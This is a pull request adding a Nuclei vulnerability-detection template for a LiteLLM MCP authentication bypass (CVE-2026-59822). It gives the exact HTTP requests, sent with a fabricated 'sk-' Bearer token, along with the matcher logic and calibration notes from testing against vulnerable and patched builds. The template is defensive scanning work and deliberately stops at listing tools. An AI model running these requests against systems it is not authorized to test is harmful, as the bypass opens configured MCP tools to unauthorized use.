### PR TITLE
Add CVE-2026-59822 template: LiteLLM MCP authentication bypass

### DIFF
--- a/http/cves/2026/CVE-2026-59822.yaml
+++ b/http/cves/2026/CVE-2026-59822.yaml
@@ -2,7 +2,7 @@ id: CVE-2026-59822
 
 info:
   name: LiteLLM MCP - Authentication Bypass
-  author: mohamed-bashir-dev
+  author: mohamed-bashir-dev,yaaras
   severity: high
   description: |
     LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format.

--- a/http/cves/2026/CVE-2026-59822.yaml
+++ b/http/cves/2026/CVE-2026-59822.yaml
@@ -1,0 +1,105 @@
+id: CVE-2026-59822
+
+info:
+  name: LiteLLM MCP - Authentication Bypass
+  author: mohamed-bashir-dev
+  severity: high
+  description: |
+    LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format.
+    Prior to 1.84.0, LiteLLM's MCP Streamable HTTP endpoint allowed an unauthenticated
+    attacker to use a fabricated Authorization header to trigger an OAuth2 passthrough
+    fallback path that replaced failed LiteLLM key validation with an empty
+    UserAPIKeyAuth() object, allowing requests to reach MCP tooling without a valid
+    LiteLLM key. A successful bypass lets the attacker list and invoke tools exposed by
+    configured MCP servers (MCP methods tools/list and tools/call). This template only
+    enumerates tools (tools/list) and never invokes any tool. This issue is fixed in
+    version 1.84.0.
+  impact: |
+    Unauthenticated attackers can establish an authenticated MCP session with an
+    arbitrary Bearer token, listing configured MCP tools and invoking them via
+    tools/call, which may lead to unauthorized data access or server-side actions
+    performed through the configured MCP servers.
+  remediation: |
+    Upgrade LiteLLM to version 1.84.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-59822
+    - https://github.com/BerriAI/litellm/security/advisories/GHSA-7488-6r32-c95q
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+    - https://docs.litellm.ai/docs/mcp
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2026-59822
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: berriai
+    product: litellm
+    shodan-query: html:"litellm"
+  tags: cve,cve2026,litellm,mcp,auth-bypass,kev,ai
+
+variables:
+  fake_key: "sk-{{rand_base(10)}}"
+
+flow: http(1) && http(2)
+
+http:
+  # Step 1: MCP initialize with a fabricated Bearer token. On vulnerable builds the
+  # OAuth2-passthrough fallback replaces the failed key validation with an empty
+  # UserAPIKeyAuth() and the JSON-RPC initialize succeeds.
+  - raw:
+      - |
+        POST /mcp/ HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{fake_key}}
+        Content-Type: application/json
+        Accept: application/json, text/event-stream
+
+        {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"probe","version":"1.0.0"}}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "jsonrpc")'
+        condition: and
+        internal: true
+
+  # Step 2: tools/list with the same fabricated token. Detection only - no tool is
+  # invoked. Vulnerable builds answer with the JSON-RPC tool listing; fixed builds
+  # reject the fake token (auth error).
+  - raw:
+      - |
+        POST /mcp/ HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{fake_key}}
+        Content-Type: application/json
+        Accept: application/json, text/event-stream
+
+        {"jsonrpc":"2.0","id":2,"method":"tools/list"}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        condition: and
+        words:
+          - "jsonrpc"
+          - "tools"
+          - "inputSchema"
+
+      - type: word
+        part: body
+        condition: or
+        negative: true
+        words:
+          - "MCP request failed"
+          - "Unauthorized"
+          - "Invalid API key"
+          - "Invalid proxy server token"
+          - "Authentication Error"

--- a/http/cves/2026/CVE-2026-59822.yaml
+++ b/http/cves/2026/CVE-2026-59822.yaml
@@ -63,6 +63,7 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(body, "jsonrpc")'
+          - 'contains(body, "litellm")'
         condition: and
         internal: true
 


### PR DESCRIPTION
### PR Information

- Added CVE-2026-59822 — LiteLLM MCP Authentication Bypass via OAuth2 passthrough fallback (GHSA-7488-6r32-c95q). **CISA KEV-listed (added 2026-09-02)**, CVSS 3.1 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N per NVD), CWE-287.
- Prior to 1.84.0, LiteLLM proxy's MCP Streamable HTTP endpoint let an unauthenticated attacker establish an authenticated MCP session with a fabricated `Authorization: Bearer <token>` header: the OAuth2-passthrough fallback path replaced failed LiteLLM key validation with an empty `UserAPIKeyAuth()`. Successful bypass allows `tools/list` and `tools/call` against configured MCP servers.
- Template logic (2 requests, detection only — no tool is ever invoked):
  1. `POST /mcp/` JSON-RPC `initialize` with a fabricated `sk-`-prefixed Bearer (internal gate: 200 + `jsonrpc` in body)
  2. `POST /mcp/` JSON-RPC `tools/list` with the same fabricated token — matchers: status 200 AND body words `jsonrpc` + `tools` + `inputSchema`, with negative words (`MCP request failed`, `Unauthorized`, `Invalid API key`, `Invalid proxy server token`, `Authentication Error`)
- References:
  - https://github.com/BerriAI/litellm/security/advisories/GHSA-7488-6r32-c95q
  - https://nvd.nist.gov/vuln/detail/CVE-2026-59822
  - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
  - https://docs.litellm.ai/docs/mcp

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive) — `litellm[proxy]==1.83.14` (latest 1.83.x) with Postgres-backed proxy + a stdio MCP server (`mcp` SDK fixture server) and `allow_all_keys: true`. `nuclei -u http://127.0.0.1:4000 -t http/cves/2026/CVE-2026-59822.yaml` → 3 matchers hit (`status-1`, `word-2`, `word-3`), stable across 3 runs. Vulnerable response body (SSE): `data: {"jsonrpc":"2.0","id":2,"result":{"tools":[{"name":"demo-echo",...,"inputSchema":{...}},...]}}`
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive) — `litellm[proxy]==1.84.0`, same config: **0 matches** (fabricated bearer → HTTP 500 `{"error":"MCP request failed"}`); also verified no detection against a plain `python3 -m http.server` (non-MCP FP check)

`nuclei -validate -t http/cves/2026/CVE-2026-59822.yaml` → All templates validated successfully.

Calibration notes that materially affect detection reliability (all observed on localhost):
- The bypass requires an **`sk-`-prefixed** fabricated token: a non-`sk-` random token hits an assertion → 500 on both builds, so the template uses `fake_key: "sk-{{rand_base(10)}}"` (fully random per scan).
- `/mcp` 307-redirects to `/mcp/`; the template targets `/mcp/` directly (nuclei does not follow redirects by default).
- LiteLLM's Streamable HTTP endpoint is stateless — no `Mcp-Session-Id` is issued, so no session extractor is needed.
- A DB-backed proxy is required for the failure path to surface as the swallowable 401 ("Invalid proxy server token") rather than a `no_db_connection` 500; and `allow_all_keys: true` on the MCP server is the documented deployment pattern under which the bypassed empty-permission session can see tools. Without it the session bypasses auth but `tools/list` returns an empty list.
- On the vulnerable build an unauthenticated (no header) request also fails with 500, so a successful detection uniquely requires the fabricated-`sk-`-bearer success — a strong signal. `tools/call` was deliberately excluded (detection only).

Full `-debug` transcripts for both instances available on request.

#### Additional Details (leave it blank if not applicable)

- Severity set to `high` to match NVD's CVSS 8.2 (classification vector/score pulled from the NVD API).
- Author: mohamed-bashir-dev.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
